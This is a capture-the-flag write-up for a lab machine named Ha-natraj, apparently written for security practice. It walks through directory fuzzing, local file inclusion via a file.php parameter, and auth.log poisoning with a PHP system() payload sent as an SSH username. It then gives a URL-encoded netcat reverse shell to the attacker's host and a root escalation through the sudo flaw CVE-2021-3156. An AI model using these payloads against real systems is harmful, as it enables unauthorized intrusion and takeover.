Ha-natraj

Target IP: 192.168.170.80


Scanning

ba35ee6208ce22ab7a5ade4e85a12a3f.png
d91635f3e4860b41009486074a820dde.png
Only two TCP ports are open for this machine: SSH and HTTP. I will start my enumeration with the HTTP application.


Enumeration

Port 80: HTTP
4056c8b02d4c303508553066f2c7d557.png
We are presented the webpage above. Observing the source-code did not result in anything useful. I also searched the page for anything useful like any parameters but I had no luck.

c8f0ddc14833ed816c21e01eff08b63a.png
The nikto scan above mentions there is a directory called /console and /images.

c7443dcd2d0e02b279d057aec06f5a54.png
The directory search also mentions only the two directories from the nikto scan.

5b0cd6b97089124b087069a137e65a9b.png
The /console/ sounds interesting. It contains a file called file.php. I will try to fuzz the parameter to see if we get anything useful. And using ffuf with the command ffuf -u http://192.168.170.80/console/file.php?FUZZ=../../../../../../etc/passwd -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -fs 0, it worked! There is a parameter called file which can be used for LFI and directory traversal attacks.

Using the command ffuf -u http://192.168.170.80/console/file.php?file=FUZZ -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -fs 0, I managed to find the LFI file payloads that I can access!

e38aa920cb2b6afc4fa52fde2ac9468b.png
I searched for any log file that could allow me to poison it for RCE. To do this, I used the following command ffuf -u http://192.168.170.80/console/file.php?file=../../../../../../../../../../../../../FUZZ -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt:FUZZ -fs 0 | grep ".log". And then I was able to find a log file called /var/log.auth.log which logs every successful or failed attempt when trying to connect with the web server.


Exploitation

I will try to poison the /var/log/auth.log file from above to gain RCE now.

04213b58e2034c5d10a4522234e6d3dd.png
Using the payload ssh '<?php echo system($_GET['cmd']);?>'@192.168.170.80, this should poison the log file above.

f689091b09b80a6cf7bcbd42fd407e9c.png
And it worked. I am able to see the output from the commands ls;id;whoami when I browse to http://192.168.170.80/console/file.php?file=/var/log/auth.log&cmd=ls;id;whoami. It is time to gain a reverse shell connection now.

12ddc3d707916f740f5cd4e312481838.png
I started a listener on port 80 and sent the full URL with URL-encoded payload as shown below. And I got a reverse shell connection back to my host.
URL-encoded payload: rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.45.211%2080%20%3E%2Ftmp%2Ff
Full URL with URL-encoded payload: http://192.168.170.80/console/file.php?file=/var/log/auth.log&cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.45.211%2080%20%3E%2Ftmp%2Ff
It is time to elevate the privileges!


Privilege Escalation

4345396d3e0345f931f4ad52f821f639.png
Looks like there is misconfigured configurations for systemctl.

6490a76f692f432b75b02eee820c2ec5.png
Hmmm... maybe we can exploit this instead. The sudo version is 1.8.21p2 which is vulnerable, and it has CVE-2021-3156. I used this exploit.

ca25b262a9f2d42a35bcf12a66978f65.png
And this was successful! Now I am root.


Flags

03f447b891674df3055333b56c71faed.png
The local.txt flag file once I gained a foothold on the machine.

13e349357c086a8aaee8e58c9a003ceb.png
The proof.txt flag once I exploited the vulnerable sudo binary.